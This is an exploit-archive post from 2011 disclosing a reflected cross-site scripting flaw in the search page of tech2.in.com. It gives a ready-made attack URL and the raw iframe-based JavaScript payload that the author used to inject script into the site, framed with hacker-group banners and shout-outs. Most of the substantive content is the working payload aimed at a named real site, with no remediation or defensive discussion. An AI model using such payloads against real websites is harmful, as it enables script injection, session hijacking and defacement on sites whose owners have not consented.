Tech2.in.com Cross Site Scripting

` %+  
$.......#........4.........|)........0............\/\/ %+  
  
%+  
%+  
  
  
%++++++++++++++++++++++++++++++++++++++++  
  
  
# Exploit Title: TECH2.IN.COM XSS vulnerability  
#Vendor: tech2.in.com  
# Date: 5th july,2011  
# Author: r007k17 a.k.a Raghavendra Karthik D  
#Google Dork: Copyright © 2011, Tech2.com India  
************************************************************  
************************************************************  
*****************************************************************  
BREIF DESCRIPTION  
*****************************  
Reflected XSS in tech2.in.com  
  
  
************************************************************  
************************************************************  
******************************************************************  
  
XSS Vulnerability  
********************************  
{DEMO} :  
http://tech2.in.com/search?q=%22%3E%3CIFRAME%20SRC=%22javascript:alert%28%27XSSed_by_r007k17%27%29;%22%3E%3C/IFRAME%3E  
  
EXPLOIT: "><IFRAME SRC="javascript:alert('XSSed_by_r007k17');"></IFRAME>  
  
  
  
************************************************************  
************************************************************  
*****************************************************************  
sp3c14l Thanks to s1d3^effects and my friends@!3.14--  
**************************************************************************  
`